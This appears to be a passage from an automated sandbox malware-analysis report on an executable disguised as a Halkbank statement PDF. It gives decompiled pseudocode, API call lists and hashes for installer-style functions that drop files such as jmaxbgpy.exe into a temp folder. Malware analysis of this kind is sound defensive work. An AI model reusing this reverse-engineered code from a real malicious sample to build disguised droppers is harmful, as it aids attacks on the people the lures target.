                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                    • GetClientRect.USER32 ref: 0040105B
                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                    • FillRect.USER32 ref: 004010E4
                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                    • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                    • String ID: F
                                                                    • API String ID: 941294808-1304234792
                                                                    • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                    • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                                    • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                    • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 72%
                                                                    			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                                    				struct _ITEMIDLIST* _v8;
                                                                    				signed int _v12;
                                                                    				signed int _v16;
                                                                    				signed int _v20;
                                                                    				signed int _v24;
                                                                    				signed int _v28;
                                                                    				signed int _t44;
                                                                    				WCHAR* _t45;
                                                                    				signed char _t47;
                                                                    				signed int _t48;
                                                                    				short _t59;
                                                                    				short _t61;
                                                                    				short _t63;
                                                                    				void* _t71;
                                                                    				signed int _t77;
                                                                    				signed int _t78;
                                                                    				short _t81;
                                                                    				short _t82;
                                                                    				signed char _t84;
                                                                    				signed int _t85;
                                                                    				void* _t98;
                                                                    				void* _t104;
                                                                    				intOrPtr* _t105;
                                                                    				void* _t107;
                                                                    				WCHAR* _t108;
                                                                    				void* _t110;
                                                                    
                                                                    				_t107 = __esi;
                                                                    				_t104 = __edi;
                                                                    				_t71 = __ebx;
                                                                    				_t44 = _a8;
                                                                    				if(_t44 < 0) {
                                                                    					_t44 =  *( *0x42923c - 4 + _t44 * 4);
                                                                    				}
                                                                    				_push(_t71);
                                                                    				_push(_t107);
                                                                    				_push(_t104);
                                                                    				_t105 =  *0x42a298 + _t44 * 2;
                                                                    				_t45 = 0x428200;
                                                                    				_t108 = 0x428200;
                                                                    				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
                                                                    					_t108 = _a4;
                                                                    					_a4 = _a4 & 0x00000000;
                                                                    				}
                                                                    				_t81 =  *_t105;
                                                                    				_a8 = _t81;
                                                                    				if(_t81 == 0) {
                                                                    					L43:
                                                                    					 *_t108 =  *_t108 & 0x00000000;
                                                                    					if(_a4 == 0) {
                                                                    						return _t45;
                                                                    					}
                                                                    					return E00406668(_a4, _t45);
                                                                    				} else {
                                                                    					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                                    						_t98 = 2;
                                                                    						_t105 = _t105 + _t98;
                                                                    						if(_t81 >= 4) {
                                                                    							if(__eflags != 0) {
                                                                    								 *_t108 = _t81;
                                                                    								_t108 = _t108 + _t98;
                                                                    								__eflags = _t108;
                                                                    							} else {
                                                                    								 *_t108 =  *_t105;
                                                                    								_t108 = _t108 + _t98;
                                                                    								_t105 = _t105 + _t98;
                                                                    							}
                                                                    							L42:
                                                                    							_t82 =  *_t105;
                                                                    							_a8 = _t82;
                                                                    							if(_t82 != 0) {
                                                                    								_t81 = _a8;
                                                                    								continue;
                                                                    							}
                                                                    							goto L43;
                                                                    						}
                                                                    						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                                    						_t47 =  *_t105;
                                                                    						_t48 = _t47 & 0x000000ff;
                                                                    						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                                    						_t85 = _t84 & 0x000000ff;
                                                                    						_v28 = _t48 | 0x00008000;
                                                                    						_t77 = 2;
                                                                    						_v16 = _t85;
                                                                    						_t105 = _t105 + _t77;
                                                                    						_v24 = _t48;
                                                                    						_v20 = _t85 | 0x00008000;
                                                                    						if(_a8 != _t77) {
                                                                    							__eflags = _a8 - 3;
                                                                    							if(_a8 != 3) {
                                                                    								__eflags = _a8 - 1;
                                                                    								if(__eflags == 0) {
                                                                    									__eflags = (_t48 | 0xffffffff) - _v12;
                                                                    									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                                    								}
                                                                    								L38:
                                                                    								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                                    								_t45 = 0x428200;
                                                                    								goto L42;
                                                                    							}
                                                                    							_t78 = _v12;
                                                                    							__eflags = _t78 - 0x1d;
                                                                    							if(_t78 != 0x1d) {
                                                                    								__eflags = (_t78 << 0xb) + 0x42b000;
                                                                    								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
                                                                    							} else {
                                                                    								E004065AF(_t108,  *0x42a268);
                                                                    							}
                                                                    							__eflags = _t78 + 0xffffffeb - 7;
                                                                    							if(__eflags < 0) {
                                                                    								L29:
                                                                    								E004068EF(_t108);
                                                                    							}
                                                                    							goto L38;
                                                                    						}
                                                                    						if( *0x42a2e4 != 0) {
                                                                    							_t77 = 4;
                                                                    						}
                                                                    						_t121 = _t48;
                                                                    						if(_t48 >= 0) {
                                                                    							__eflags = _t48 - 0x25;
                                                                    							if(_t48 != 0x25) {
                                                                    								__eflags = _t48 - 0x24;
                                                                    								if(_t48 == 0x24) {
                                                                    									GetWindowsDirectoryW(_t108, 0x400);
                                                                    									_t77 = 0;
                                                                    								}
                                                                    								while(1) {
                                                                    									__eflags = _t77;
                                                                    									if(_t77 == 0) {
                                                                    										goto L26;
                                                                    									}
                                                                    									_t59 =  *0x42a264;
                                                                    									_t77 = _t77 - 1;
                                                                    									__eflags = _t59;
                                                                    									if(_t59 == 0) {
                                                                    										L22:
                                                                    										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                                    										__eflags = _t61;
                                                                    										if(_t61 != 0) {
                                                                    											L24:
                                                                    											 *_t108 =  *_t108 & 0x00000000;
                                                                    											__eflags =  *_t108;
                                                                    											continue;
                                                                    										}
                                                                    										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                                    										_a8 = _t61;
                                                                    										__imp__CoTaskMemFree(_v8);
                                                                    										__eflags = _a8;
                                                                    										if(_a8 != 0) {
                                                                    											goto L26;
                                                                    										}
                                                                    										goto L24;
                                                                    									}
                                                                    									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                                                    									__eflags = _t63;
                                                                    									if(_t63 == 0) {
                                                                    										goto L26;
                                                                    									}
                                                                    									goto L22;
                                                                    								}
                                                                    								goto L26;
                                                                    							}
                                                                    							GetSystemDirectoryW(_t108, 0x400);
                                                                    							goto L26;
                                                                    						} else {
                                                                    							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                                                    							if( *_t108 != 0) {
                                                                    								L27:
                                                                    								if(_v16 == 0x1a) {
                                                                    									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                    								}
                                                                    								goto L29;
                                                                    							}
                                                                    							E004066A5(_t77, _t105, _t108, _t108, _v16);
                                                                    							L26:
                                                                    							if( *_t108 == 0) {
                                                                    								goto L29;
                                                                    							}
                                                                    							goto L27;
                                                                    						}
                                                                    					}
                                                                    					goto L43;
                                                                    				}
                                                                    			}





























                                                                    0x004066a5
                                                                    0x004066a5
                                                                    0x004066a5
                                                                    0x004066ab
                                                                    0x004066b0
                                                                    0x004066c1
                                                                    0x004066c1
                                                                    0x004066c9
                                                                    0x004066ca
                                                                    0x004066cb
                                                                    0x004066cc
                                                                    0x004066cf
                                                                    0x004066d7
                                                                    0x004066d9
                                                                    0x004066ea
                                                                    0x004066ed
                                                                    0x004066ed
                                                                    0x004066f1
                                                                    0x004066f7
                                                                    0x004066fa
                                                                    0x004068d5
                                                                    0x004068d5
                                                                    0x004068e0
                                                                    0x004068ec
                                                                    0x004068ec
                                                                    0x00000000
                                                                    0x00406700
                                                                    0x00406705
                                                                    0x0040671a
                                                                    0x0040671b
                                                                    0x00406721
                                                                    0x004068b3
                                                                    0x004068c1
                                                                    0x004068c4
                                                                    0x004068c4
                                                                    0x004068b5
                                                                    0x004068b8
                                                                    0x004068bb
                                                                    0x004068bd
                                                                    0x004068bd
                                                                    0x004068c6
                                                                    0x004068c6
                                                                    0x004068cc
                                                                    0x004068cf
                                                                    0x00406702
                                                                    0x00000000
                                                                    0x00406702
                                                                    0x00000000
                                                                    0x004068cf
                                                                    0x00406727
                                                                    0x0040672a
                                                                    0x00406739
                                                                    0x00406740
                                                                    0x0040674c
                                                                    0x0040674f
                                                                    0x00406752
                                                                    0x00406753
                                                                    0x00406758
                                                                    0x0040675e
                                                                    0x00406761
                                                                    0x00406764
                                                                    0x00406857
                                                                    0x0040685c
                                                                    0x0040688f
                                                                    0x00406894
                                                                    0x00406899
                                                                    0x0040689e
                                                                    0x0040689e
                                                                    0x004068a3
                                                                    0x004068a9
                                                                    0x004068ac
                                                                    0x00000000
                                                                    0x004068ac
                                                                    0x0040685e
                                                                    0x00406861
                                                                    0x00406864
                                                                    0x00406879
                                                                    0x00406880
                                                                    0x00406866
                                                                    0x0040686d
                                                                    0x0040686d
                                                                    0x00406888
                                                                    0x0040688b
                                                                    0x0040684f
                                                                    0x00406850
                                                                    0x00406850
                                                                    0x00000000
                                                                    0x0040688b
                                                                    0x00406771
                                                                    0x00406775
                                                                    0x00406775
                                                                    0x00406776
                                                                    0x00406778
                                                                    0x004067b5
                                                                    0x004067b8
                                                                    0x004067c8
                                                                    0x004067cb
                                                                    0x004067d3
                                                                    0x004067d9
                                                                    0x004067d9
                                                                    0x00406834
                                                                    0x00406834
                                                                    0x00406836
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004067dd
                                                                    0x004067e2
                                                                    0x004067e3
                                                                    0x004067e5
                                                                    0x004067fc
                                                                    0x0040680a
                                                                    0x00406810
                                                                    0x00406812
                                                                    0x00406830
                                                                    0x00406830
                                                                    0x00406830
                                                                    0x00000000
                                                                    0x00406830
                                                                    0x00406818
                                                                    0x00406821
                                                                    0x00406824
                                                                    0x0040682a
                                                                    0x0040682e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040682e
                                                                    0x004067f6
                                                                    0x004067f8
                                                                    0x004067fa
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004067fa
                                                                    0x00000000
                                                                    0x00406834
                                                                    0x004067c0
                                                                    0x00000000
                                                                    0x0040677a
                                                                    0x00406798
                                                                    0x004067a1
                                                                    0x0040683e
                                                                    0x00406842
                                                                    0x0040684a
                                                                    0x0040684a
                                                                    0x00000000
                                                                    0x00406842
                                                                    0x004067ab
                                                                    0x00406838
                                                                    0x0040683c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040683c
                                                                    0x00406778
                                                                    0x00000000
                                                                    0x00406705

                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj,00000400), ref: 004067C0
                                                                    • GetWindowsDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                                                                    • lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                    • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                    • String ID: "C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                    • API String ID: 4260037668-3680482725
                                                                    • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                                    • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                                    • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                                    • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E004056CA(signed int _a4, WCHAR* _a8) {
                                                                    				struct HWND__* _v8;
                                                                    				signed int _v12;
                                                                    				WCHAR* _v32;
                                                                    				long _v44;
                                                                    				int _v48;
                                                                    				void* _v52;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				WCHAR* _t27;
                                                                    				signed int _t28;
                                                                    				long _t29;
                                                                    				signed int _t37;
                                                                    				signed int _t38;
                                                                    
                                                                    				_t27 =  *0x429244;
                                                                    				_v8 = _t27;
                                                                    				if(_t27 != 0) {
                                                                    					_t37 =  *0x42a314;
                                                                    					_v12 = _t37;
                                                                    					_t38 = _t37 & 0x00000001;
                                                                    					if(_t38 == 0) {
                                                                    						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
                                                                    					}
                                                                    					_t27 = lstrlenW(0x422728);
                                                                    					_a4 = _t27;
                                                                    					if(_a8 == 0) {
                                                                    						L6:
                                                                    						if((_v12 & 0x00000004) == 0) {
                                                                    							_t27 = SetWindowTextW( *0x429228, 0x422728);
                                                                    						}
                                                                    						if((_v12 & 0x00000002) == 0) {
                                                                    							_v32 = 0x422728;
                                                                    							_v52 = 1;
                                                                    							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                                                                    							_v44 = 0;
                                                                    							_v48 = _t29 - _t38;
                                                                    							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                                                                    							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                                                                    						}
                                                                    						if(_t38 != 0) {
                                                                    							_t28 = _a4;
                                                                    							0x422728[_t28] = 0;
                                                                    							return _t28;
                                                                    						}
                                                                    					} else {
                                                                    						_t27 = lstrlenW(_a8) + _a4;
                                                                    						if(_t27 < 0x1000) {
                                                                    							_t27 = lstrcatW(0x422728, _a8);
                                                                    							goto L6;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return _t27;
                                                                    			}

















                                                                    0x004056d0
                                                                    0x004056da
                                                                    0x004056df
                                                                    0x004056e5
                                                                    0x004056f0
                                                                    0x004056f3
                                                                    0x004056f6
                                                                    0x004056fc
                                                                    0x004056fc
                                                                    0x00405702
                                                                    0x0040570a
                                                                    0x0040570d
                                                                    0x0040572a
                                                                    0x0040572e
                                                                    0x00405737
                                                                    0x00405737
                                                                    0x00405741
                                                                    0x0040574a
                                                                    0x00405756
                                                                    0x0040575d
                                                                    0x00405761
                                                                    0x00405764
                                                                    0x00405777
                                                                    0x00405785
                                                                    0x00405785
                                                                    0x00405789
                                                                    0x0040578b
                                                                    0x0040578e
                                                                    0x00000000
                                                                    0x0040578e
                                                                    0x0040570f
                                                                    0x00405717
                                                                    0x0040571f
                                                                    0x00405725
                                                                    0x00000000
                                                                    0x00405725
                                                                    0x0040571f
                                                                    0x0040570d
                                                                    0x0040579a

                                                                    APIs
                                                                    • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                    • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                    • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                    • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                      • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                      • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                    • String ID: ('B
                                                                    • API String ID: 1495540970-2332581011
                                                                    • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                    • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                                    • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                    • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                    				struct tagLOGBRUSH _v16;
                                                                    				long _t39;
                                                                    				long _t41;
                                                                    				void* _t44;
                                                                    				signed char _t50;
                                                                    				long* _t54;
                                                                    
                                                                    				if(_a4 + 0xfffffecd > 5) {
                                                                    					L18:
                                                                    					return 0;
                                                                    				}
                                                                    				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                                    				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                                    					goto L18;
                                                                    				} else {
                                                                    					_t50 = _t54[5];
                                                                    					if((_t50 & 0xffffffe0) != 0) {
                                                                    						goto L18;
                                                                    					}
                                                                    					_t39 =  *_t54;
                                                                    					if((_t50 & 0x00000002) != 0) {
                                                                    						_t39 = GetSysColor(_t39);
                                                                    					}
                                                                    					if((_t54[5] & 0x00000001) != 0) {
                                                                    						SetTextColor(_a8, _t39);
                                                                    					}
                                                                    					SetBkMode(_a8, _t54[4]);
                                                                    					_t41 = _t54[1];
                                                                    					_v16.lbColor = _t41;
                                                                    					if((_t54[5] & 0x00000008) != 0) {
                                                                    						_t41 = GetSysColor(_t41);
                                                                    						_v16.lbColor = _t41;
                                                                    					}
                                                                    					if((_t54[5] & 0x00000004) != 0) {
                                                                    						SetBkColor(_a8, _t41);
                                                                    					}
                                                                    					if((_t54[5] & 0x00000010) != 0) {
                                                                    						_v16.lbStyle = _t54[2];
                                                                    						_t44 = _t54[3];
                                                                    						if(_t44 != 0) {
                                                                    							DeleteObject(_t44);
                                                                    						}
                                                                    						_t54[3] = CreateBrushIndirect( &_v16);
                                                                    					}
                                                                    					return _t54[3];
                                                                    				}
                                                                    			}









                                                                    0x0040463d
                                                                    0x004046f3
                                                                    0x00000000
                                                                    0x004046f3
                                                                    0x0040464e
                                                                    0x00404652
                                                                    0x00000000
                                                                    0x0040466c
                                                                    0x0040466c
                                                                    0x00404675
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404677
                                                                    0x00404683
                                                                    0x00404686
                                                                    0x00404686
                                                                    0x0040468c
                                                                    0x00404692
                                                                    0x00404692
                                                                    0x0040469e
                                                                    0x004046a4
                                                                    0x004046ab
                                                                    0x004046ae
                                                                    0x004046b1
                                                                    0x004046b3
                                                                    0x004046b3
                                                                    0x004046bb
                                                                    0x004046c1
                                                                    0x004046c1
                                                                    0x004046cb
                                                                    0x004046d0
                                                                    0x004046d3
                                                                    0x004046d8
                                                                    0x004046db
                                                                    0x004046db
                                                                    0x004046eb
                                                                    0x004046eb
                                                                    0x00000000
                                                                    0x004046ee

                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                                    • GetSysColor.USER32(00000000), ref: 00404686
                                                                    • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                                    • SetBkMode.GDI32(?,?), ref: 0040469E
                                                                    • GetSysColor.USER32(?), ref: 004046B1
                                                                    • SetBkColor.GDI32(?,?), ref: 004046C1
                                                                    • DeleteObject.GDI32(?), ref: 004046DB
                                                                    • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                    • String ID:
                                                                    • API String ID: 2320649405-0
                                                                    • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                    • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                                    • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                    • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 87%
                                                                    			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                                    				intOrPtr _t65;
                                                                    				intOrPtr _t66;
                                                                    				intOrPtr _t72;
                                                                    				void* _t76;
                                                                    				void* _t79;
                                                                    
                                                                    				_t72 = __edx;
                                                                    				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                                    				_t65 = 2;
                                                                    				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                                    				_t66 = E00402D84(_t65);
                                                                    				_t79 = _t66 - 1;
                                                                    				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                                    				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                                    				if(_t79 < 0) {
                                                                    					L36:
                                                                    					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
                                                                    				} else {
                                                                    					__ecx = 0x3ff;
                                                                    					if(__eax > 0x3ff) {
                                                                    						 *(__ebp - 0x44) = 0x3ff;
                                                                    					}
                                                                    					if( *__edi == __bx) {
                                                                    						L34:
                                                                    						__ecx =  *(__ebp - 0xc);
                                                                    						__eax =  *(__ebp - 8);
                                                                    						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                                    						if(_t79 == 0) {
                                                                    							 *(_t76 - 4) = 1;
                                                                    						}
                                                                    						goto L36;
                                                                    					} else {
                                                                    						 *(__ebp - 0x38) = __ebx;
                                                                    						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
                                                                    						if( *(__ebp - 0x44) > __ebx) {
                                                                    							do {
                                                                    								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                                    									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
                                                                    										__eax = __ebp - 0x50;
                                                                    										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                                    											goto L34;
                                                                    										} else {
                                                                    											goto L21;
                                                                    										}
                                                                    									} else {
                                                                    										goto L34;
                                                                    									}
                                                                    								} else {
                                                                    									__eax = __ebp - 0x40;
                                                                    									_push(__ebx);
                                                                    									_push(__ebp - 0x40);
                                                                    									__eax = 2;
